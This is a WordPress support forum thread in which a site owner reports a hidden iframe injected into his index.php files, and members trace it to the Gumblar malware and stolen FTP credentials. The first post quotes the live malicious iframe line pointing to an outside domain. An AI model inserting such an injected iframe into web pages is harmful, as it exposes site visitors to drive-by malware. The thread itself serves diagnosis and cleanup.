Forums

WordPress › Support » How-To and Troubleshooting

Hidden iFrame injection?? (6 posts)

  1. Brad_Isaac
    Member
    Posted 5 months ago #

    Hi,

    A few weeks ago, I found that someone had injected hidden iframe code into my headers. I immediately backed up the blog and restored it from backup. Then I changed all my passwords.

    This morning, it appears the same person ran the same injection routine that changed all my index.php files to point to their rogue site (<iframe src="http://globalnameshop.cn:8080/index.php" width=126 height=148 style="visibility: hidden"></iframe>)

    My site is http://www.persistenceunlimited.com

    How are they doing this? I've run the hardening utilities and checked all settings, but can't find how they are doing this.

    Thanks,
    Brad

  2. ClaytonJames
    Member
    Posted 5 months ago #

    Assuming that you are already sure that you have no issues with passwords/ftp/admin account compromises, you may want to examine your plugins for any "known" injection vulnerabilities first. I'm not sure how many of the 46 plugins that are on that site are actually being/been used, but perhaps there is something there that might be helpful. Have you had the opportunity to review the log files for the days preceding/surrounding the noticed code injections?

  3. Shane G
    Member
    Posted 5 months ago #

    Hi,

    If you are installing and uninstalling through fantastico then may be possible that iframe code can added automatically inside the index page of the blog..

    Also use latest version and non Vulnerable plugins into your blog and uninstall all unwanted plugins..

    Thanks,

    Shane G.

  4. usef_ksa
    Member
    Posted 5 months ago #

    Hi,
    also I have the same problem. please if you find a solution,kindly let us know.
    I am trying to solve this problem.

  5. Brad_Isaac
    Member
    Posted 5 months ago #

    Thank you, I disabled a lot of the plugins. but maybe I should delete them from the server. PS which log files do you recommend me checking out? I don't think I've found any as of yet.

    Thanks again

  6. whooami
    Member
    Posted 5 months ago #

    .. hes talking about your server logs, and your ftp log.

    .. if youre not using a plugin, you ought to delete it.

    finally, if you google that domain, globalnameshop.cn, you'll find it's tied to gumblar.

    if you did ANY further looking, you would have read that sites that are hit by gumblar are a result of malware on one's local machine.

    Your FTP credentials were sent of to Estonia, or Latvia, or Russia , or China, or some other super friendly country.

    Said FTP credentials were used to login to your site (by other zombie computers), make changes, and ultimately propagate more gumbklar infections.

    You can verify this by looking at your FTP log, assuming your host has those available.

    Unless and until you clean the malware of the offending computer(s), and change your ftp password, you can expect to be hacked again.

    Not to mention the fact that your computer just became a zombie in a botnet.

    Freaked out? Good -- go here:

    http://www.malwarebytes.org/

    download their software, and use it.

Reply

You must log in to post.

About this Topic

Tags